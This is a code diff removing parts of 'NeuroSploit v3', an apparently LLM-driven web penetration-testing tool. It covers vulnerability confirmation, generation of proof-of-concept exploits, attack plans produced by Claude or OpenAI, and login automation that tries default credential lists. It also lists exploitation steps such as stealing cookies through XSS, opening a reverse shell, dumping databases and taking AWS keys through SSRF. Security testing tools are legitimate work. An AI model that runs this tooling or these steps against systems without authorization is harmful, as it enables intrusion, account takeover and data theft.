result["evidence"] = f"Internal content: {indicator}"
break
return result
async def _llm_confirm_vulnerability(
self, vuln_type: str, payload: str, body: str, status: int, headers: Dict, endpoint: str
) -> Dict:
"""Use LLM to confirm if a vulnerability is real"""
prompt = f"""Analyze this HTTP response to determine if there is a REAL {vuln_type.upper()} vulnerability.
IMPORTANT: Only confirm if you are CERTAIN. Avoid false positives.
Endpoint: {endpoint}
Payload sent: {payload}
HTTP Status: {status}
Response headers: {json.dumps(dict(list(headers.items())[:10]))}
Response body (truncated): {body[:2000]}
Analyze and respond with JSON:
{{
"confirmed": true/false,
"confidence": "high"/"medium"/"low",
"evidence": "specific evidence from response",
"exploitable": true/false,
"analysis": "brief explanation"
}}
CRITICAL RULES:
1. For XSS: Payload must be reflected WITHOUT encoding in a context where it executes
2. For SQLi: Must see actual SQL error messages, not just reflected input
3. For LFI: Must see actual file contents (like /etc/passwd)
4. For SSTI: Math expressions must be EVALUATED (49 for 7*7)
5. For RCE: Must see command output (uid=, /bin/, etc.)
If uncertain, set confirmed=false. Better to miss a vuln than report false positive."""
try:
response = self.llm_manager.generate(
prompt,
"You are a security expert. Analyze HTTP responses to confirm vulnerabilities. Be precise and avoid false positives."
)
# Parse JSON response
match = re.search(r'\{.*?\}', response, re.DOTALL)
if match:
result = json.loads(match.group())
return result
except Exception as e:
await self.log("debug", f"LLM confirmation error: {e}")
return {"confirmed": False}
def _get_severity(self, vuln_type: str) -> str:
"""Get severity based on vulnerability type"""
severity_map = {
"rce": "critical",
"sqli": "critical",
"ssti": "critical",
"lfi": "high",
"ssrf": "high",
"xss": "high",
"xxe": "high",
"idor": "medium",
"open_redirect": "medium",
}
return severity_map.get(vuln_type, "medium")
def _get_impact(self, vuln_type: str) -> str:
"""Get impact description"""
impact_map = {
"rce": "Remote Code Execution - Full server compromise",
"sqli": "SQL Injection - Database compromise, data theft",
"ssti": "Server-Side Template Injection - RCE possible",
"lfi": "Local File Inclusion - Sensitive data exposure",
"ssrf": "Server-Side Request Forgery - Internal network access",
"xss": "Cross-Site Scripting - Session hijacking",
"xxe": "XML External Entity - Data theft, SSRF",
"idor": "Insecure Direct Object Reference - Data access",
"open_redirect": "Open Redirect - Phishing attacks",
}
return impact_map.get(vuln_type, "Security vulnerability")
async def _exploitation_phase(self):
"""Generate PoC code for confirmed vulnerabilities"""
await self.log("info", f" Generating PoC for {len(self.state.findings)} confirmed vulnerabilities...")
for finding in self.state.findings:
if finding.exploitable:
poc = await self._generate_poc(finding)
finding.poc_code = poc
finding.exploitation_steps = self._get_exploitation_steps(finding)
await self.log("info", f" PoC generated for {finding.vuln_type}")
async def _generate_poc(self, finding: Finding) -> str:
"""Generate PoC code using LLM if available"""
if self.llm_manager:
try:
prompt = f"""Generate a Python proof-of-concept exploit for this vulnerability:
Type: {finding.vuln_type}
Endpoint: {finding.endpoint}
Payload: {finding.payload}
Evidence: {finding.evidence}
Create a working Python script that:
1. Demonstrates the vulnerability
2. Includes proper error handling
3. Has comments explaining each step
4. Is safe to run (no destructive actions)
Return ONLY the Python code, no explanations."""
response = self.llm_manager.generate(prompt, "You are a security researcher. Generate safe, educational PoC code.")
# Extract code block
code_match = re.search(r'```python\n(.*?)```', response, re.DOTALL)
if code_match:
return code_match.group(1)
elif "import" in response:
return response
except Exception as e:
await self.log("debug", f"PoC generation error: {e}")
# Fallback to template
return self._get_poc_template(finding)
def _get_poc_template(self, finding: Finding) -> str:
"""Get PoC template for a vulnerability"""
return f'''#!/usr/bin/env python3
"""
{finding.vuln_type.upper()} Proof of Concept
Target: {finding.endpoint}
Generated by NeuroSploit AI Agent
"""
import requests
def exploit():
url = "{finding.endpoint}"
payload = "{finding.payload}"
response = requests.get(url, params={{"test": payload}})
print(f"Status: {{response.status_code}}")
print(f"Vulnerable: {{{repr(finding.evidence)}}} in response.text")
if __name__ == "__main__":
exploit()
'''
def _get_exploitation_steps(self, finding: Finding) -> List[str]:
"""Get exploitation steps for a vulnerability"""
steps_map = {
"xss": [
"1. Confirm XSS with alert(document.domain)",
"2. Craft cookie stealing payload",
"3. Host attacker server to receive cookies",
"4. Send malicious link to victim",
],
"sqli": [
"1. Confirm injection with error-based payloads",
"2. Enumerate database with UNION SELECT",
"3. Extract table names from information_schema",
"4. Dump sensitive data (credentials, PII)",
],
"lfi": [
"1. Confirm LFI with /etc/passwd",
"2. Read application source code",
"3. Extract credentials from config files",
"4. Attempt log poisoning for RCE",
],
"rce": [
"1. CRITICAL - Confirm command execution",
"2. Establish reverse shell",
"3. Enumerate system and network",
"4. Escalate privileges",
],
}
return steps_map.get(finding.vuln_type, ["1. Investigate further", "2. Attempt exploitation"])
async def _chaining_phase(self):
"""Analyze potential attack chains"""
await self.log("info", " Analyzing attack chain possibilities...")
vuln_types = [f.vuln_type for f in self.state.findings]
if "xss" in vuln_types:
await self.log("info", " Chain: XSS -> Session Hijacking -> Account Takeover")
if "sqli" in vuln_types:
await self.log("info", " Chain: SQLi -> Data Extraction -> Credential Theft")
if "lfi" in vuln_types:
await self.log("info", " Chain: SQLi + LFI -> Database File Read -> RCE via INTO OUTFILE")
if "ssrf" in vuln_types:
await self.log("info", " Chain: SSRF -> Cloud Metadata -> AWS Keys -> Full Compromise")
async def _generate_report(self) -> Dict[str, Any]:
"""Generate comprehensive report"""
report = {
"target": self.target,
"scan_date": datetime.utcnow().isoformat(),
"agent": "NeuroSploit AI Agent v3",
"mode": "LLM-powered intelligent testing",
"llm_enabled": self.llm_manager is not None,
"summary": {
"total_endpoints": len(self.state.discovered_endpoints),
"total_parameters": sum(len(v) for v in self.state.discovered_params.values()),
"total_vulnerabilities": len(self.state.findings),
"critical": len([f for f in self.state.findings if f.severity == "critical"]),
"high": len([f for f in self.state.findings if f.severity == "high"]),
"medium": len([f for f in self.state.findings if f.severity == "medium"]),
"low": len([f for f in self.state.findings if f.severity == "low"]),
"technologies": self.state.technologies,
},
"findings": [],
"recommendations": [],
}
for finding in self.state.findings:
report["findings"].append({
"type": finding.vuln_type,
"severity": finding.severity,
"confidence": finding.confidence,
"endpoint": finding.endpoint,
"payload": finding.payload,
"evidence": finding.evidence,
"impact": finding.impact,
"exploitable": finding.exploitable,
"exploitation_steps": finding.exploitation_steps,
"poc_code": finding.poc_code,
"llm_analysis": finding.llm_analysis,
})
# Log summary
await self.log("info", "=" * 60)
await self.log("info", "REPORT SUMMARY")
await self.log("info", "=" * 60)
await self.log("info", f"Confirmed Vulnerabilities: {len(self.state.findings)}")
await self.log("info", f" Critical: {report['summary']['critical']}")
await self.log("info", f" High: {report['summary']['high']}")
await self.log("info", f" Medium: {report['summary']['medium']}")
for finding in self.state.findings:
await self.log("warning", f" [{finding.severity.upper()}] {finding.vuln_type}: {finding.endpoint[:50]}")
return report
@@ -1,553 +0,0 @@
"""
NeuroSploit v3 - AI-Powered Prompt Processor
Uses Claude/OpenAI to intelligently analyze prompts and determine:
1. What vulnerabilities to test
2. Testing strategy and depth
3. Custom payloads based on context
4. Dynamic analysis based on recon results
"""
import os
import json
import asyncio
from typing import List, Dict, Any, Optional
from dataclasses import dataclass
@dataclass
class TestingPlan:
"""AI-generated testing plan"""
vulnerability_types: List[str]
testing_focus: List[str]
custom_payloads: List[str]
testing_depth: str
specific_endpoints: List[str]
bypass_techniques: List[str]
priority_order: List[str]
ai_reasoning: str
class AIPromptProcessor:
"""
Uses LLM (Claude/OpenAI) to process prompts and generate intelligent testing plans.
NOT limited to predefined vulnerability types - the AI decides what to test.
"""
def __init__(self):
self.anthropic_key = os.environ.get("ANTHROPIC_API_KEY", "")
self.openai_key = os.environ.get("OPENAI_API_KEY", "")
async def process_prompt(
self,
prompt: str,
recon_data: Optional[Dict] = None,
target_info: Optional[Dict] = None
) -> TestingPlan:
"""
Process a user prompt with AI to generate a testing plan.
Args:
prompt: User's testing prompt/instructions
recon_data: Results from reconnaissance phase
target_info: Information about the target
Returns:
TestingPlan with AI-determined testing strategy
"""
# Build context for the AI
context = self._build_context(prompt, recon_data, target_info)
# Try Claude first, then OpenAI
if self.anthropic_key:
return await self._process_with_claude(context)
elif self.openai_key:
return await self._process_with_openai(context)
else:
# Fallback to intelligent defaults based on prompt analysis
return await self._intelligent_fallback(prompt, recon_data)
def _build_context(
self,
prompt: str,
recon_data: Optional[Dict],
target_info: Optional[Dict]
) -> str:
"""Build comprehensive context for the AI"""
context_parts = [
"You are an expert penetration tester analyzing a target.",
f"\n## User's Testing Request:\n{prompt}",
]
if target_info:
context_parts.append(f"\n## Target Information:\n{json.dumps(target_info, indent=2)}")
if recon_data:
# Summarize recon data
summary = {
"subdomains_count": len(recon_data.get("subdomains", [])),
"live_hosts": recon_data.get("live_hosts", [])[:10],
"endpoints_count": len(recon_data.get("endpoints", [])),
"sample_endpoints": [e.get("url", e) if isinstance(e, dict) else e for e in recon_data.get("endpoints", [])[:20]],
"urls_with_params": [u for u in recon_data.get("urls", []) if "?" in str(u)][:10],
"open_ports": recon_data.get("ports", [])[:20],
"technologies": recon_data.get("technologies", []),
"interesting_paths": recon_data.get("interesting_paths", []),
"js_files": recon_data.get("js_files", [])[:10],
"nuclei_findings": recon_data.get("vulnerabilities", [])
}
context_parts.append(f"\n## Reconnaissance Results:\n{json.dumps(summary, indent=2)}")
context_parts.append("""
## Your Task:
Based on the user's request and the reconnaissance data, create a comprehensive testing plan.
You are NOT limited to specific vulnerability types - analyze the context and determine what to test.
Consider:
1. What the user specifically asked for
2. What the recon data reveals (technologies, endpoints, parameters)
3. Common vulnerabilities for the detected tech stack
4. Any interesting findings that warrant deeper testing
5. OWASP Top 10 and beyond based on context
Respond with a JSON object containing:
{
"vulnerability_types": ["list of specific vulnerability types to test"],
"testing_focus": ["specific areas to focus on based on findings"],
"custom_payloads": ["any custom payloads based on detected technologies"],
"testing_depth": "quick|medium|thorough",
"specific_endpoints": ["high-priority endpoints to test first"],
"bypass_techniques": ["WAF/filter bypass techniques if applicable"],
"priority_order": ["ordered list of what to test first"],
"ai_reasoning": "brief explanation of why you chose this testing strategy"
}
""")
return "\n".join(context_parts)
async def _process_with_claude(self, context: str) -> TestingPlan:
"""Process with Claude API"""
try:
import httpx
async with httpx.AsyncClient(timeout=60.0) as client:
response = await client.post(
"https://api.anthropic.com/v1/messages",
headers={
"x-api-key": self.anthropic_key,
"anthropic-version": "2023-06-01",
"content-type": "application/json"
},
json={
"model": "claude-sonnet-4-20250514",
"max_tokens": 4096,
"messages": [
{"role": "user", "content": context}
]
}
)
if response.status_code == 200:
data = response.json()
content = data.get("content", [{}])[0].get("text", "{}")
# Extract JSON from response
return self._parse_ai_response(content)
else:
print(f"Claude API error: {response.status_code}")
return await self._intelligent_fallback(context, None)
except Exception as e:
print(f"Claude processing error: {e}")
return await self._intelligent_fallback(context, None)
async def _process_with_openai(self, context: str) -> TestingPlan:
"""Process with OpenAI API"""
try:
import httpx
async with httpx.AsyncClient(timeout=60.0) as client:
response = await client.post(
"https://api.openai.com/v1/chat/completions",
headers={
"Authorization": f"Bearer {self.openai_key}",
"Content-Type": "application/json"
},
json={
"model": "gpt-4o",
"messages": [
{"role": "system", "content": "You are an expert penetration tester. Respond only with valid JSON."},
{"role": "user", "content": context}
],
"max_tokens": 4096,
"temperature": 0.3
}
)
if response.status_code == 200:
data = response.json()
content = data.get("choices", [{}])[0].get("message", {}).get("content", "{}")
return self._parse_ai_response(content)
else:
print(f"OpenAI API error: {response.status_code}")
return await self._intelligent_fallback(context, None)
except Exception as e:
print(f"OpenAI processing error: {e}")
return await self._intelligent_fallback(context, None)
def _parse_ai_response(self, content: str) -> TestingPlan:
"""Parse AI response into TestingPlan"""
try:
# Try to extract JSON from the response
import re
json_match = re.search(r'\{[\s\S]*\}', content)
if json_match:
data = json.loads(json_match.group())
return TestingPlan(
vulnerability_types=data.get("vulnerability_types", []),
testing_focus=data.get("testing_focus", []),
custom_payloads=data.get("custom_payloads", []),
testing_depth=data.get("testing_depth", "medium"),
specific_endpoints=data.get("specific_endpoints", []),
bypass_techniques=data.get("bypass_techniques", []),
priority_order=data.get("priority_order", []),
ai_reasoning=data.get("ai_reasoning", "AI-generated testing plan")
)
except Exception as e:
print(f"Failed to parse AI response: {e}")
return self._default_plan()
async def _intelligent_fallback(self, prompt: str, recon_data: Optional[Dict]) -> TestingPlan:
"""
Intelligent fallback when no API key is available.
Still provides smart testing plan based on prompt and recon analysis.
"""
prompt_lower = prompt.lower()
vuln_types = []
focus = []
priority = []
# Analyze prompt for specific requests
if any(word in prompt_lower for word in ["xss", "cross-site", "script"]):
vuln_types.extend(["xss_reflected", "xss_stored", "xss_dom"])
priority.append("XSS Testing")
if any(word in prompt_lower for word in ["sql", "injection", "database", "sqli"]):
vuln_types.extend(["sqli_error", "sqli_blind", "sqli_time", "sqli_union"])
priority.append("SQL Injection")
if any(word in prompt_lower for word in ["command", "rce", "exec", "shell"]):
vuln_types.extend(["command_injection", "rce", "os_injection"])
priority.append("Command Injection")
if any(word in prompt_lower for word in ["file", "lfi", "rfi", "path", "traversal", "include"]):
vuln_types.extend(["lfi", "rfi", "path_traversal"])
priority.append("File Inclusion")
if any(word in prompt_lower for word in ["ssrf", "request forgery", "server-side"]):
vuln_types.extend(["ssrf", "ssrf_cloud"])
priority.append("SSRF")
if any(word in prompt_lower for word in ["auth", "login", "password", "session", "jwt", "token"]):
vuln_types.extend(["auth_bypass", "session_fixation", "jwt_manipulation", "brute_force"])
priority.append("Authentication Testing")
if any(word in prompt_lower for word in ["idor", "authorization", "access control", "privilege"]):
vuln_types.extend(["idor", "bola", "privilege_escalation"])
priority.append("Authorization Testing")
if any(word in prompt_lower for word in ["api", "rest", "graphql", "endpoint"]):
vuln_types.extend(["api_abuse", "mass_assignment", "rate_limiting", "graphql_introspection"])
priority.append("API Security")
if any(word in prompt_lower for word in ["cors", "header", "security header"]):
vuln_types.extend(["cors_misconfiguration", "missing_security_headers"])
priority.append("Headers & CORS")
if any(word in prompt_lower for word in ["upload", "file upload"]):
vuln_types.extend(["file_upload", "unrestricted_upload"])
priority.append("File Upload Testing")
if any(word in prompt_lower for word in ["redirect", "open redirect"]):
vuln_types.extend(["open_redirect"])
priority.append("Open Redirect")
if any(word in prompt_lower for word in ["ssti", "template"]):
vuln_types.extend(["ssti"])
priority.append("SSTI")
if any(word in prompt_lower for word in ["xxe", "xml"]):
vuln_types.extend(["xxe"])
priority.append("XXE")
if any(word in prompt_lower for word in ["deserialization", "serialize"]):
vuln_types.extend(["insecure_deserialization"])
priority.append("Deserialization")
# If prompt mentions comprehensive/full/all/everything
if any(word in prompt_lower for word in ["comprehensive", "full", "all", "everything", "complete", "pentest", "assessment"]):
vuln_types = list(set(vuln_types + [
"xss_reflected", "xss_stored", "sqli_error", "sqli_blind",
"command_injection", "lfi", "path_traversal", "ssrf",
"auth_bypass", "idor", "cors_misconfiguration", "open_redirect",
"ssti", "file_upload", "xxe", "missing_security_headers"
]))
focus.append("Comprehensive security assessment")
# OWASP Top 10 focus
if "owasp" in prompt_lower:
vuln_types = list(set(vuln_types + [
"sqli_error", "xss_reflected", "auth_bypass", "idor",
"security_misconfiguration", "sensitive_data_exposure",
"xxe", "insecure_deserialization", "missing_security_headers",
"ssrf"
]))
focus.append("OWASP Top 10 Coverage")
# Bug bounty focus
if any(word in prompt_lower for word in ["bounty", "bug bounty", "high impact"]):
vuln_types = list(set(vuln_types + [
"sqli_error", "xss_stored", "rce", "ssrf", "idor",
"auth_bypass", "privilege_escalation"
]))
focus.append("High-impact vulnerabilities for bug bounty")
# Analyze recon data if available
if recon_data:
endpoints = recon_data.get("endpoints", [])
urls = recon_data.get("urls", [])
techs = recon_data.get("technologies", [])
# Check for parameters (injection points)
param_urls = [u for u in urls if "?" in str(u)]
if param_urls:
focus.append(f"Found {len(param_urls)} URLs with parameters - test for injection")
if "sqli_error" not in vuln_types:
vuln_types.append("sqli_error")
if "xss_reflected" not in vuln_types:
vuln_types.append("xss_reflected")
# Check for interesting paths
interesting = recon_data.get("interesting_paths", [])
if interesting:
focus.append(f"Found {len(interesting)} interesting paths to investigate")
# Check for JS files (DOM XSS potential)
js_files = recon_data.get("js_files", [])
if js_files:
focus.append(f"Found {len(js_files)} JS files - check for DOM XSS and secrets")
if "xss_dom" not in vuln_types:
vuln_types.append("xss_dom")
# Technology-specific testing
tech_str = str(techs).lower()
if "php" in tech_str:
vuln_types = list(set(vuln_types + ["lfi", "rfi", "file_upload"]))
if "wordpress" in tech_str:
focus.append("WordPress detected - test for WP-specific vulns")
if "java" in tech_str or "spring" in tech_str:
vuln_types = list(set(vuln_types + ["ssti", "insecure_deserialization"]))
if "node" in tech_str or "express" in tech_str:
vuln_types = list(set(vuln_types + ["prototype_pollution", "ssti"]))
if "api" in tech_str or "json" in tech_str:
vuln_types = list(set(vuln_types + ["api_abuse", "mass_assignment"]))
# Default if nothing specific found
if not vuln_types:
vuln_types = [
"xss_reflected", "sqli_error", "lfi", "open_redirect",
"cors_misconfiguration", "missing_security_headers"
]
focus.append("General security assessment")
return TestingPlan(
vulnerability_types=vuln_types,
testing_focus=focus if focus else ["General vulnerability testing"],
custom_payloads=[],
testing_depth="medium",
specific_endpoints=[],
bypass_techniques=[],
priority_order=priority if priority else vuln_types[:5],
ai_reasoning="Intelligent fallback analysis based on prompt keywords and recon data"
)
def _default_plan(self) -> TestingPlan:
"""Default testing plan"""
return TestingPlan(
vulnerability_types=[
"xss_reflected", "sqli_error", "sqli_blind", "command_injection",
"lfi", "path_traversal", "ssrf", "auth_bypass", "idor",
"cors_misconfiguration", "open_redirect", "missing_security_headers"
],
testing_focus=["Comprehensive vulnerability assessment"],
custom_payloads=[],
testing_depth="medium",
specific_endpoints=[],
bypass_techniques=[],
priority_order=["SQL Injection", "XSS", "Command Injection", "Authentication"],
ai_reasoning="Default comprehensive testing plan"
)
class AIVulnerabilityAnalyzer:
"""
Uses AI to analyze potential vulnerabilities found during testing.
Provides intelligent confirmation and exploitation guidance.
"""
def __init__(self):
self.anthropic_key = os.environ.get("ANTHROPIC_API_KEY", "")
self.openai_key = os.environ.get("OPENAI_API_KEY", "")
async def analyze_finding(
self,
vuln_type: str,
request: Dict,
response: Dict,
payload: str,
context: Optional[Dict] = None
) -> Dict[str, Any]:
"""
Use AI to analyze a potential vulnerability finding.
Returns confidence level, exploitation advice, and remediation.
"""
if not self.anthropic_key and not self.openai_key:
return self._basic_analysis(vuln_type, request, response, payload)
prompt = f"""
Analyze this potential security vulnerability:
**Vulnerability Type**: {vuln_type}
**Payload Used**: {payload}
**Request**: {json.dumps(request, indent=2)[:1000]}
**Response Status**: {response.get('status')}
**Response Body Preview**: {response.get('body_preview', '')[:500]}
Analyze and respond with JSON:
{{
"is_vulnerable": true/false,
"confidence": 0.0-1.0,
"evidence": "specific evidence from response",
"severity": "critical/high/medium/low/info",
"exploitation_path": "how to exploit if vulnerable",
"remediation": "how to fix",
"false_positive_indicators": ["reasons this might be false positive"]
}}
"""
try:
if self.anthropic_key:
return await self._analyze_with_claude(prompt)
elif self.openai_key:
return await self._analyze_with_openai(prompt)
except Exception as e:
print(f"AI analysis error: {e}")
return self._basic_analysis(vuln_type, request, response, payload)
async def _analyze_with_claude(self, prompt: str) -> Dict:
"""Analyze with Claude"""
import httpx
async with httpx.AsyncClient(timeout=30.0) as client:
response = await client.post(
"https://api.anthropic.com/v1/messages",
headers={
"x-api-key": self.anthropic_key,
"anthropic-version": "2023-06-01",
"content-type": "application/json"
},
json={
"model": "claude-sonnet-4-20250514",
"max_tokens": 1024,
"messages": [{"role": "user", "content": prompt}]
}
)
if response.status_code == 200:
data = response.json()
content = data.get("content", [{}])[0].get("text", "{}")
import re
json_match = re.search(r'\{[\s\S]*\}', content)
if json_match:
return json.loads(json_match.group())
return {}
async def _analyze_with_openai(self, prompt: str) -> Dict:
"""Analyze with OpenAI"""
import httpx
async with httpx.AsyncClient(timeout=30.0) as client:
response = await client.post(
"https://api.openai.com/v1/chat/completions",
headers={
"Authorization": f"Bearer {self.openai_key}",
"Content-Type": "application/json"
},
json={
"model": "gpt-4o",
"messages": [
{"role": "system", "content": "You are a security expert. Respond only with valid JSON."},
{"role": "user", "content": prompt}
],
"max_tokens": 1024
}
)
if response.status_code == 200:
data = response.json()
content = data.get("choices", [{}])[0].get("message", {}).get("content", "{}")
import re
json_match = re.search(r'\{[\s\S]*\}', content)
if json_match:
return json.loads(json_match.group())
return {}
def _basic_analysis(self, vuln_type: str, request: Dict, response: Dict, payload: str) -> Dict:
"""Basic analysis without AI"""
body = response.get("body_preview", "").lower()
status = response.get("status", 0)
is_vulnerable = False
confidence = 0.0
evidence = ""
# Basic detection patterns
if vuln_type in ["xss_reflected", "xss_stored"]:
if payload.lower() in body:
is_vulnerable = True
confidence = 0.7
evidence = f"Payload reflected in response"
elif vuln_type in ["sqli_error", "sqli_blind"]:
error_patterns = ["sql", "mysql", "syntax", "query", "oracle", "postgresql", "sqlite"]
if any(p in body for p in error_patterns):
is_vulnerable = True
confidence = 0.8
evidence = "SQL error message detected"
elif vuln_type == "lfi":
if "root:" in body or "[extensions]" in body:
is_vulnerable = True
confidence = 0.9
evidence = "File content detected in response"
elif vuln_type == "open_redirect":
if status in [301, 302, 303, 307, 308]:
is_vulnerable = True
confidence = 0.6
evidence = "Redirect detected"
return {
"is_vulnerable": is_vulnerable,
"confidence": confidence,
"evidence": evidence,
"severity": "medium",
"exploitation_path": "",
"remediation": "",
"false_positive_indicators": []
}
-596
View File
@@ -1,596 +0,0 @@
"""
NeuroSploit v3 - Authentication Manager
Autonomous login, session management, multi-user context for
BOLA/BFLA/IDOR testing. Handles login form detection, CSRF extraction,
credential management, and session refresh.
"""
import logging
import re
import time
from dataclasses import dataclass, field
from datetime import datetime
from typing import Callable, Dict, List, Optional, Any
from urllib.parse import urlparse, urljoin
logger = logging.getLogger(__name__)
@dataclass
class Credentials:
"""A set of credentials for testing."""
username: str
password: str
role: str = "user" # user, admin
source: str = "provided" # provided, discovered, default
@dataclass
class SessionContext:
"""Authentication session state."""
name: str # "user_a", "user_b", "admin"
role: str # user, admin
cookies: Dict[str, str] = field(default_factory=dict)
tokens: Dict[str, str] = field(default_factory=dict) # bearer, jwt, api_key
headers: Dict[str, str] = field(default_factory=dict) # Authorization: Bearer xxx
state: str = "unauthenticated" # unauthenticated, authenticating, authenticated, expired
login_time: Optional[float] = None
credential: Optional[Credentials] = None
login_url: Optional[str] = None
session_duration: float = 3600.0 # Estimated session lifetime (1 hour default)
@dataclass
class LoginForm:
"""Detected login form."""
url: str # Form action URL
method: str # POST usually
username_field: str # name attribute of username input
password_field: str # name attribute of password input
csrf_field: Optional[str] = None
csrf_value: Optional[str] = None
extra_fields: Dict[str, str] = field(default_factory=dict)
confidence: float = 0.0
class AuthManager:
"""Autonomous authentication manager.
Manages login automation, session tracking, and multi-user
contexts for access control vulnerability testing.
Features:
- Login form detection from HTML
- CSRF token extraction
- Credential management (provided + discovered)
- Session state machine (unauthenticated -> authenticated -> expired)
- Multi-user contexts for BOLA/BFLA/IDOR testing
- Auto session refresh on expiry detection
- Token extraction from responses (JWT, Bearer, API keys)
"""
# Default credentials to try on admin panels
DEFAULT_CREDENTIALS = [
Credentials("admin", "admin", "admin", "default"),
Credentials("admin", "password", "admin", "default"),
Credentials("admin", "admin123", "admin", "default"),
Credentials("root", "root", "admin", "default"),
Credentials("test", "test", "user", "default"),
Credentials("user", "user", "user", "default"),
Credentials("admin", "Password1", "admin", "default"),
Credentials("administrator", "administrator", "admin", "default"),
]
# Session expiry indicators
EXPIRY_INDICATORS = [
"session expired", "session timeout", "please log in",
"please login", "sign in again", "token expired",
"unauthorized", "authentication required", "not authenticated",
"jwt expired", "invalid token", "access token expired",
]
# Login success indicators
SUCCESS_INDICATORS = [
"welcome", "dashboard", "my account", "profile",
"logged in", "sign out", "logout", "log out",
"home", "settings", "preferences",
]
# Login failure indicators
FAILURE_INDICATORS = [
"invalid", "incorrect", "wrong", "failed", "error",
"denied", "bad credentials", "authentication failed",
"login failed", "invalid username", "invalid password",
]
def __init__(self, request_engine=None, recon=None):
self.request_engine = request_engine
self.recon = recon
# Credential store
self._credentials: Dict[str, List[Credentials]] = {
"user": [],
"admin": [],
}
# Session contexts
self.contexts: Dict[str, SessionContext] = {
"user_a": SessionContext(name="user_a", role="user"),
"user_b": SessionContext(name="user_b", role="user"),
"admin": SessionContext(name="admin", role="admin"),
}
# Discovered login forms
self._login_forms: List[LoginForm] = []
self._login_attempts = 0
self._successful_logins = 0
# --- Credential Management -------------------------------------------
def add_credentials(self, username: str, password: str, role: str = "user", source: str = "provided"):
"""Add credentials for testing."""
cred = Credentials(username, password, role, source)
self._credentials.setdefault(role, []).append(cred)
logger.debug(f"Added {role} credentials: {username} (source: {source})")
def add_discovered_credentials(self, creds_list: List[Dict]):
"""Add credentials discovered during testing (from info disclosure, etc.)."""
for cred_info in creds_list:
username = cred_info.get("username", "")
password = cred_info.get("password", "")
if username and password:
self.add_credentials(username, password, role="user", source="discovered")
def get_credentials_for_role(self, role: str) -> List[Credentials]:
"""Get all credentials for a role."""
creds = self._credentials.get(role, [])
if not creds and role == "admin":
return self.DEFAULT_CREDENTIALS[:4] # Only admin defaults
if not creds and role == "user":
return self.DEFAULT_CREDENTIALS[4:6] # Only user defaults
return creds
# --- Login Form Detection --------------------------------------------
def detect_login_forms(self, html: str, page_url: str) -> List[LoginForm]:
"""Detect login forms in HTML content."""
forms = []
# Find all <form> tags
form_pattern = re.compile(
r'<form[^>]*>(.*?)</form>',
re.DOTALL | re.IGNORECASE
)
for form_match in form_pattern.finditer(html):
form_html = form_match.group(0)
form_inner = form_match.group(1)
# Check if this looks like a login form
has_password = bool(re.search(r'type=["\']password["\']', form_inner, re.I))
if not has_password:
continue
# Extract form action
action_match = re.search(r'action=["\']([^"\']*)["\']', form_html, re.I)
action = action_match.group(1) if action_match else page_url
if not action.startswith("http"):
action = urljoin(page_url, action)
# Extract method
method_match = re.search(r'method=["\']([^"\']*)["\']', form_html, re.I)
method = (method_match.group(1) if method_match else "POST").upper()
# Find username field
username_field = self._find_username_field(form_inner)
# Find password field
password_field = self._find_field_name(form_inner, r'type=["\']password["\']')
# Find CSRF token
csrf_field, csrf_value = self._find_csrf_token(form_inner)
# Find hidden fields
extra_fields = self._find_hidden_fields(form_inner)
if csrf_field and csrf_field in extra_fields:
del extra_fields[csrf_field]
# Calculate confidence
confidence = 0.5 # Has password field
login_keywords = ["login", "signin", "sign-in", "auth", "log-in", "session"]
if any(kw in action.lower() for kw in login_keywords):
confidence += 0.3
if any(kw in form_html.lower() for kw in login_keywords):
confidence += 0.2
if username_field and password_field:
forms.append(LoginForm(
url=action,
method=method,
username_field=username_field,
password_field=password_field,
csrf_field=csrf_field,
csrf_value=csrf_value,
extra_fields=extra_fields,
confidence=min(1.0, confidence),
))
# Sort by confidence
forms.sort(key=lambda f: f.confidence, reverse=True)
self._login_forms.extend(forms)
return forms
def _find_username_field(self, html: str) -> Optional[str]:
"""Find the username/email input field name."""
# Priority: explicit username/email fields
patterns = [
r'name=["\']([^"\']*(?:user|login|email|account)[^"\']*)["\']',
r'name=["\']([^"\']*)["\'].*?type=["\'](?:text|email)["\']',
r'type=["\'](?:text|email)["\'].*?name=["\']([^"\']*)["\']',
]
for pattern in patterns:
match = re.search(pattern, html, re.I)
if match:
return match.group(1)
return None
def _find_field_name(self, html: str, type_pattern: str) -> Optional[str]:
"""Find field name for a given input type pattern."""
# Try: name="x" ... type="password"
match = re.search(
r'name=["\']([^"\']+)["\'][^>]*' + type_pattern,
html, re.I
)
if match:
return match.group(1)
# Try: type="password" ... name="x"
match = re.search(
type_pattern + r'[^>]*name=["\']([^"\']+)["\']',
html, re.I
)
if match:
return match.group(1)
return None
def _find_csrf_token(self, html: str):
"""Find CSRF token in form."""
csrf_patterns = [
r'name=["\']([^"\']*(?:csrf|_token|csrfmiddlewaretoken|__RequestVerificationToken|authenticity_token|_csrf_token)[^"\']*)["\'][^>]*value=["\']([^"\']*)["\']',
r'value=["\']([^"\']*)["\'][^>]*name=["\']([^"\']*(?:csrf|_token|csrfmiddlewaretoken)[^"\']*)["\']',
]
for pattern in csrf_patterns:
match = re.search(pattern, html, re.I)
if match:
groups = match.groups()
if "csrf" in groups[0].lower() or "_token" in groups[0].lower():
return groups[0], groups[1]
return groups[1], groups[0]
return None, None
def _find_hidden_fields(self, html: str) -> Dict[str, str]:
"""Extract all hidden field name-value pairs."""
fields = {}
pattern = re.compile(
r'type=["\']hidden["\'][^>]*name=["\']([^"\']+)["\'][^>]*value=["\']([^"\']*)["\']',
re.I
)
for match in pattern.finditer(html):
fields[match.group(1)] = match.group(2)
# Also try reverse order (name before type)
pattern2 = re.compile(
r'name=["\']([^"\']+)["\'][^>]*type=["\']hidden["\'][^>]*value=["\']([^"\']*)["\']',
re.I
)
for match in pattern2.finditer(html):
fields[match.group(1)] = match.group(2)
return fields
# --- Authentication --------------------------------------------------
async def authenticate(self, context_name: str = "user_a") -> bool:
"""Attempt to authenticate a session context.
Tries login forms with available credentials.
Returns True if authentication succeeded.
"""
if not self.request_engine:
return False
ctx = self.contexts.get(context_name)
if not ctx:
return False
ctx.state = "authenticating"
creds = self.get_credentials_for_role(ctx.role)
if not creds:
logger.debug(f"No credentials available for {context_name} ({ctx.role})")
ctx.state = "unauthenticated"
return False
# Find login forms if not already discovered
if not self._login_forms:
await self._discover_login_forms()
if not self._login_forms:
logger.debug("No login forms found")
ctx.state = "unauthenticated"
return False
# Try each form with each credential
for form in self._login_forms:
for cred in creds:
self._login_attempts += 1
success = await self._attempt_login(form, cred, ctx)
if success:
ctx.state = "authenticated"
ctx.credential = cred
ctx.login_time = time.time()
ctx.login_url = form.url
self._successful_logins += 1
